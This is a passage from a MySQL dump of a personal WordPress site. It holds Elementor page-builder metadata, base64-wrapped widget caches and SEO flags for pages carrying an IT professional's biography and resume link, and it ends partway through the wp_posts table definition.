pe\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4685,855,'_elementor_pro_version','3.28.3'),
(4686,855,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4689,856,'_elementor_edit_mode','builder'),
(4690,856,'_elementor_template_type','wp-page'),
(4691,856,'_elementor_version','3.28.3'),
(4692,856,'_wp_page_template','default'),
(4693,856,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4694,856,'_elementor_pro_version','3.28.3'),
(4695,856,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4704,51,'rank_math_og_content_image','a:2:{s:5:\"check\";s:32:\"9a173eeaac8ddea323a6cab5d1a53de3\";s:6:\"images\";a:1:{i:0;i:791;}}'),
(4727,760,'rank_math_internal_links_processed','1'),
(4728,752,'rank_math_internal_links_processed','1'),
(4729,741,'rank_math_internal_links_processed','1'),
(4730,630,'rank_math_internal_links_processed','1'),
(4731,615,'rank_math_internal_links_processed','1'),
(4732,603,'rank_math_internal_links_processed','1'),
(4733,583,'rank_math_internal_links_processed','1'),
(4734,329,'rank_math_internal_links_processed','1'),
(4735,312,'rank_math_internal_links_processed','1'),
(4736,305,'rank_math_internal_links_processed','1'),
(4737,150,'rank_math_internal_links_processed','1'),
(4738,110,'rank_math_internal_links_processed','1'),
(4739,104,'rank_math_internal_links_processed','1'),
(4740,97,'rank_math_internal_links_processed','1'),
(4741,68,'rank_math_internal_links_processed','1'),
(4742,66,'rank_math_internal_links_processed','1'),
(4743,64,'rank_math_internal_links_processed','1'),
(4744,60,'rank_math_internal_links_processed','1'),
(4745,56,'rank_math_internal_links_processed','1'),
(4746,51,'rank_math_internal_links_processed','1'),
(4747,27,'rank_math_internal_links_processed','1'),
(4822,345,'_elementor_css','a:6:{s:4:\"time\";i:1770710420;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:1;s:11:\"Roboto Slab\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(4823,715,'_elementor_page_assets','a:2:{s:6:\"styles\";a:2:{i:0;s:15:\"widget-nav-menu\";i:1;s:12:\"widget-image\";}s:7:\"scripts\";a:1:{i:0;s:10:\"smartmenus\";}}'),
(4824,358,'_elementor_page_assets','a:0:{}'),
(4825,647,'_elementor_page_assets','a:2:{s:6:\"styles\";a:2:{i:0;s:12:\"widget-image\";i:1;s:12:\"widget-posts\";}s:7:\"scripts\";a:1:{i:0;s:12:\"imagesloaded\";}}'),
(4826,647,'_elementor_css','a:6:{s:4:\"time\";i:1770710420;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(4827,715,'_elementor_css','a:6:{s:4:\"time\";i:1770710420;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:1:{i:0;s:7:\"8ab8263\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(4828,358,'_elementor_css','a:6:{s:4:\"time\";i:1770710420;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(4829,715,'_elementor_element_cache','{\"timeout\":1770796820,\"value\":{\"content\":\"<div class=\\\"elementor-element elementor-element-26f7bc3 e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"26f7bc3\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t<div class=\\\"elementor-element elementor-element-6a3646c e-con-full e-flex e-con e-child\\\" data-id=\\\"6a3646c\\\" data-element_type=\\\"container\\\">\\n\\t\\t[elementor-element data=\\\"eyJpZCI6ImFmMmNkODciLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJtZW51IjoibWFpbi1tZW51IiwiX19nbG9iYWxzX18iOnsiY29sb3JfbWVudV9pdGVtIjoiZ2xvYmFsc1wvY29sb3JzP2lkPXRleHQiLCJjb2xvcl9tZW51X2l0ZW1faG92ZXIiOiJnbG9iYWxzXC9jb2xvcnM\\/aWQ9YWNjZW50IiwicG9pbnRlcl9jb2xvcl9tZW51X2l0ZW1faG92ZXIiOiJnbG9iYWxzXC9jb2xvcnM\\/aWQ9c2Vjb25kYXJ5IiwiY29sb3JfbWVudV9pdGVtX2FjdGl2ZSI6Imdsb2JhbHNcL2NvbG9ycz9pZD1hY2NlbnQifSwiYWxpZ25faXRlbXMiOiJjZW50ZXIiLCJmdWxsX3dpZHRoIjoic3RyZXRjaCIsInRleHRfYWxpZ24iOiJjZW50ZXIiLCJtZW51X3R5cG9ncmFwaHlfdHlwb2dyYXBoeSI6ImN1c3RvbSIsIm1lbnVfdHlwb2dyYXBoeV9mb250X3NpemUiOnsidW5pdCI6InB4Iiwic2l6ZSI6MzUsInNpemVzIjpbXX0sIm1lbnVfdHlwb2dyYXBoeV9mb250X3NpemVfdGFibGV0Ijp7InVuaXQiOiJjdXN0b20iLCJzaXplIjoiIiwic2l6ZXMiOltdfSwibWVudV90eXBvZ3JhcGh5X2ZvbnRfc2l6ZV9tb2JpbGUiOnsidW5pdCI6ImN1c3RvbSIsInNpemUiOiIiLCJzaXplcyI6W119LCJtZW51X3R5cG9ncmFwaHlfZm9udF93ZWlnaHQiOiI5MDAiLCJwb2ludGVyX3dpZHRoIjp7InVuaXQiOiJweCIsInNpemUiOjAsInNpemVzIjpbXX0sIm1lbnVfc3BhY2VfYmV0d2VlbiI6eyJ1bml0IjoicHgiLCJzaXplIjowLCJzaXplcyI6W119fSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoibmF2LW1lbnUifQ==\\\"]\\t\\t<\\/div>\\n\\t\\t<div class=\\\"elementor-element elementor-element-293e0f3 e-con-full e-flex e-con e-child\\\" data-id=\\\"293e0f3\\\" data-element_type=\\\"container\\\">\\n\\t\\t[elementor-element data=\\\"eyJpZCI6IjhhYjgyNjMiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJfX2R5bmFtaWNfXyI6eyJpbWFnZSI6IltlbGVtZW50b3ItdGFnIGlkPVwiXCIgbmFtZT1cInNpdGUtbG9nb1wiIHNldHRpbmdzPVwiJTdCJTdEXCJdIn19LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0aGVtZS1zaXRlLWxvZ28ifQ==\\\"]\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),
(4830,647,'_elementor_element_cache','{\"timeout\":1779065299,\"value\":{\"content\":\"<div class=\\\"elementor-element elementor-element-14c1d57 e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"14c1d57\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t<div class=\\\"elementor-element elementor-element-e9b4c22 e-con-full e-flex e-con e-child\\\" data-id=\\\"e9b4c22\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-b572b86 elementor-widget elementor-widget-image\\\" data-id=\\\"b572b86\\\" data-element_type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img src=\\\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\\\" title=\\\"\\\" alt=\\\"\\\" loading=\\\"lazy\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element data=\\\"eyJpZCI6Ijk5OWY0NjciLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBjbGFzcz1cInAxXCI+PHNwYW4gYXJpYS1oaWRkZW49XCJ0cnVlXCI+V2l0aCBvdmVyIDEzIHllYXJzIG9mIGV4cGVyaWVuY2UgaW4gdGhlIElUIChCYW5raW5nLCBGaW5hbmNpYWwgYW5kIEludmVzdG1lbnQpIGluZHVzdHJ5LCBJIGJyaW5nIGEgY29tcHJlaGVuc2l2ZSBza2lsbHNldCBlbmNvbXBhc3NpbmcgZGF0YWJhc2UgYWRtaW5pc3RyYXRpb24sIGRhdGEgZW5naW5lZXJpbmcsIGluZnJhc3RydWN0dXJlIG1hbmFnZW1lbnQsIExpbnV4IHByb2ZpY2llbmN5LCBhbmQgSVQgbGVhZGVyc2hpcC4gTXkgZXhwZXJ0aXNlIGluIGJ1aWxkaW5nIGFuZCBtYWludGFpbmluZyByb2J1c3QgSVQgaW5mcmFzdHJ1Y3R1cmVzIGhhcyBlbmFibGVkIG1lIHRvIGRyaXZlIG9wZXJhdGlvbmFsIGVmZmljaWVuY3kgYW5kIGNvc3Qgb3B0aW1pemF0aW9uIGFjcm9zcyB2YXJpb3VzIG9yZ2FuaXphdGlvbnMuIEkgYW0gYWRlcHQgYXQgbWFuYWdpbmcgY29tcGxleCBwcm9qZWN0cywgZm9zdGVyaW5nIGNvbGxhYm9yYXRpdmUgdGVhbXMsIGFuZCBlbnN1cmluZyB0aGUgc2VhbWxlc3MgZGVsaXZlcnkgb2YgSVQgc29sdXRpb25zIHRoYXQgYWxpZ24gd2l0aCBidXNpbmVzcyBvYmplY3RpdmVzLiBNeSBwYXNzaW9uIGZvciB0ZWNobm9sb2d5IGFuZCBjb250aW51b3VzIGxlYXJuaW5nIGRyaXZlcyBtZSB0byBzdGF5IGF0IHRoZSBmb3JlZnJvbnQgb2YgZW1lcmdpbmcgdHJlbmRzIGFuZCBpbm5vdmF0aW9ucywgZW5zdXJpbmcgdGhhdCBteSBza2lsbHMgYW5kIGV4cGVydGlzZSByZW1haW4gcmVsZXZhbnQgaW4gdGhlIGV2ZXItZXZvbHZpbmcgSVQgbGFuZHNjYXBlLjxcL3NwYW4+PFwvcD4iLCJfX2dsb2JhbHNfXyI6eyJ0ZXh0X2NvbG9yIjoiZ2xvYmFsc1wvY29sb3JzP2lkPXRleHQifSwiYWxpZ24iOiJqdXN0aWZ5In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0=\\\"]\\t\\t<\\/div>\\n\\t\\t<div class=\\\"elementor-element elementor-element-42211f7 e-con-full e-flex e-con e-child\\\" data-id=\\\"42211f7\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),
(4831,358,'_elementor_element_cache','{\"timeout\":1770796820,\"value\":{\"content\":\"\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-b6afb7b elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"b6afb7b\\\" data-element_type=\\\"section\\\" data-settings=\\\"{"background_background":"classic"}\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b4f6b82\\\" data-id=\\\"b4f6b82\\\" data-element_type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t[elementor-element data=\\\"eyJpZCI6ImUyNTM4OWMiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIj5kZXNpZ25lZCAmYW1wOyBtYWludGFpbmVkIGJ5XHUwMGEwIDxhIGhyZWY9XCJodHRwOlwvXC93d3cuaWN0YmFuay5pclwiPklDVEJBTks8XC9hPjxcL3A+IiwidGV4dF9jb2xvciI6IiNGRkZGRkYifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),
(4832,681,'_elementor_page_assets','a:1:{s:6:\"styles\";a:1:{i:0;s:14:\"widget-heading\";}}'),
(4833,68,'_elementor_page_assets','a:0:{}'),
(4834,681,'_elementor_css','a:6:{s:4:\"time\";i:1770710566;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:1:{i:0;s:7:\"ed102a1\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(4835,681,'_elementor_element_cache','{\"timeout\":1770796966,\"value\":{\"content\":\"<div class=\\\"elementor-element elementor-element-69ab661 e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"69ab661\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t[elementor-element data=\\\"eyJpZCI6ImVkMTAyYTEiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJfX2R5bmFtaWNfXyI6eyJ0aXRsZSI6IltlbGVtZW50b3ItdGFnIGlkPVwiXCIgbmFtZT1cInBvc3QtdGl0bGVcIiBzZXR0aW5ncz1cIiU3QiUyMmJlZm9yZSUyMiUzQSUyMiUyMiUyQyUyMmFmdGVyJTIyJTNBJTIyJTIyJTJDJTIyZmFsbGJhY2slMjIlM0ElMjIlMjIlN0RcIl0ifSwidGl0bGUiOiJBZGQgWW91ciBIZWFkaW5nIFRleHQgSGVyZSIsImFsaWduIjoiY2VudGVyIiwidGV4dF9zaGFkb3dfdGV4dF9zaGFkb3ciOnsiaG9yaXpvbnRhbCI6MTAsInZlcnRpY2FsIjowLCJibHVyIjo3NiwiY29sb3IiOiIjRkZGRkZGIn0sIl9wYWRkaW5nIjp7InVuaXQiOiJweCIsInRvcCI6IjEwIiwicmlnaHQiOiIxMCIsImJvdHRvbSI6IjEwIiwibGVmdCI6IjEwIiwiaXNMaW5rZWQiOnRydWV9LCJfYmFja2dyb3VuZF9iYWNrZ3JvdW5kIjoiY2xhc3NpYyIsIl9ib3JkZXJfcmFkaXVzIjp7InVuaXQiOiJweCIsInRvcCI6IjIwIiwicmlnaHQiOiIyMCIsImJvdHRvbSI6IjIwIiwibGVmdCI6IjIwIiwiaXNMaW5rZWQiOnRydWV9LCJfX2dsb2JhbHNfXyI6eyJ0aXRsZV9jb2xvciI6Imdsb2JhbHNcL2NvbG9ycz9pZD1wcmltYXJ5IiwiX2JhY2tncm91bmRfY29sb3IiOiJnbG9iYWxzXC9jb2xvcnM\\/aWQ9c2Vjb25kYXJ5In19LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0aGVtZS1wb3N0LXRpdGxlIn0=\\\"]\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t<div class=\\\"elementor-element elementor-element-623f01c e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"623f01c\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t[elementor-element data=\\\"eyJpZCI6ImE3N2E1NDEiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJfX2dsb2JhbHNfXyI6eyJ0ZXh0X2NvbG9yIjoiZ2xvYmFsc1wvY29sb3JzP2lkPXRleHQifX0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRoZW1lLXBvc3QtY29udGVudCJ9\\\"]\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),
(4836,51,'_elementor_page_assets','a:1:{s:6:\"styles\";a:2:{i:0;s:12:\"widget-image\";i:1;s:14:\"widget-heading\";}}'),
(4837,51,'_elementor_css','a:6:{s:4:\"time\";i:1770786088;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(4838,51,'_elementor_element_cache','{\"timeout\":1777023513,\"value\":{\"content\":\"<div class=\\\"elementor-element elementor-element-52462b9 e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"52462b9\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t<div class=\\\"elementor-element elementor-element-21b8beb e-con-full e-flex e-con e-child\\\" data-id=\\\"21b8beb\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-66dbece elementor-widget elementor-widget-image\\\" data-id=\\\"66dbece\\\" data-element_type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"800\\\" height=\\\"666\\\" src=\\\"https:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420-1024x853.jpg\\\" class=\\\"attachment-large size-large wp-image-791\\\" alt=\\\"\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t<div class=\\\"elementor-element elementor-element-fc57f11 e-con-full e-flex e-con e-child\\\" data-id=\\\"fc57f11\\\" data-element_type=\\\"container\\\">\\n\\t\\t[elementor-element data=\\\"eyJpZCI6IjE0ZWMwZWNkIiwiZWxUeXBlIjoid2lkZ2V0Iiwic2V0dGluZ3MiOnsiZWRpdG9yIjoiPCEtLSB3cDpwYXJhZ3JhcGggLS0+XG48cD5XaXRoIDExIHllYXJzIG9mIGV4cGVyaWVuY2UgaW4gdGhlIElUIGluZHVzdHJ5LCBwcmltYXJpbHkgaW4gdGhlIGJhbmtpbmcgc2VjdG9yLCBJIGJyaW5nIGEgd2VhbHRoIG9mIGtub3dsZWRnZSBhbmQgZXhwZXJ0aXNlIGluIElUIG1hbmFnZW1lbnQuIE15IGV4cGVyaWVuY2UgYXMgYSBkYXRhYmFzZSBhZG1pbmlzdHJhdG9yIGFuZCBkYXRhIHdhcmVob3VzZSBkZXNpZ25lciBoYXMgZ2l2ZW4gbWUgYSBkZWVwIHVuZGVyc3RhbmRpbmcgb2YgaG93IHRvIGVmZmVjdGl2ZWx5IG9yZ2FuaXplLCBzdG9yZSwgYW5kIHV0aWxpemUgZGF0YS4gSW4gYWRkaXRpb24sIG15IGJhY2tncm91bmQgYXMgYSBrbm93bGVkZ2VhYmxlIElUIG1hbmFnZXIgaGFzIGVxdWlwcGVkIG1lIHdpdGggdGhlIHNraWxscyBuZWVkZWQgdG8gbGVhZCBhbmQgbW90aXZhdGUgdGVhbXMgdG8gYWNoaWV2ZSB0aGVpciBnb2Fscy4gQXMgYW4gSVQgY29uc3VsdGFudCBhbmQgYWR2aXNvciwgSSBoYXZlIGEgcGFzc2lvbiBmb3IgaGVscGluZyBvcmdhbml6YXRpb25zIG9wdGltaXplIHRoZWlyIGRhdGEgYW5kIElUIG9wZXJhdGlvbnMsIGFuZCBhbSBjb21taXR0ZWQgdG8gcHJvdmlkaW5nIGhpZ2gtcXVhbGl0eSBzb2x1dGlvbnMgdGhhdCBtZWV0IHRoZWlyIHVuaXF1ZSBuZWVkcy48XC9wPlxuPCEtLSBcL3dwOnBhcmFncmFwaCAtLT48IS0tIHdwOnBhcmFncmFwaCAtLT5cbjxwPlx1MDBhMDxcL3A+XG48IS0tIFwvd3A6cGFyYWdyYXBoIC0tPjwhLS0gd3A6cGFyYWdyYXBoIC0tPlxuPHA+XHUwMGEwPFwvcD5cbjwhLS0gXC93cDpwYXJhZ3JhcGggLS0+PCEtLSB3cDpwYXJhZ3JhcGggLS0+XG48cD5cdTAwYTA8XC9wPlxuPCEtLSBcL3dwOnBhcmFncmFwaCAtLT48IS0tIHdwOnBhcmFncmFwaCAtLT5cbjxwPlx1MDBhMDxcL3A+XG48IS0tIFwvd3A6cGFyYWdyYXBoIC0tPiIsIl9fZ2xvYmFsc19fIjp7InRleHRfY29sb3IiOiJnbG9iYWxzXC9jb2xvcnM\\/aWQ9dGV4dCJ9fSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t<div class=\\\"elementor-element elementor-element-6bd211a0 e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"6bd211a0\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-d64d431 elementor-widget elementor-widget-heading\\\" data-id=\\\"d64d431\\\" data-element_type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\"><a href=\\\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/CV-DBA.pdf\\\">My Resume<\\/a><\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),
(4839,630,'_elementor_page_assets','a:1:{s:6:\"styles\";a:1:{i:0;s:14:\"widget-heading\";}}'),
(4840,630,'_elementor_css','a:6:{s:4:\"time\";i:1776928173;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(4841,630,'_elementor_element_cache','{\"timeout\":1777014573,\"value\":{\"content\":\"<div class=\\\"elementor-element elementor-element-056e6f7 e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"056e6f7\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-eb90375 elementor-widget elementor-widget-heading\\\" data-id=\\\"eb90375\\\" data-element_type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">Database Related posts<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t<div class=\\\"elementor-element elementor-element-c1b39a7 e-flex e-con-boxed e-con e-parent\\\" data-id=\\\"c1b39a7\\\" data-element_type=\\\"container\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"e-con-inner\\\">\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts`
--
DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_posts` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext NOT NULL,
`post_title` text NOT NULL,
`post_excerpt` text NOT NULL,
`post_status` varchar(20) NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) NOT NULL DEFAULT 'open',
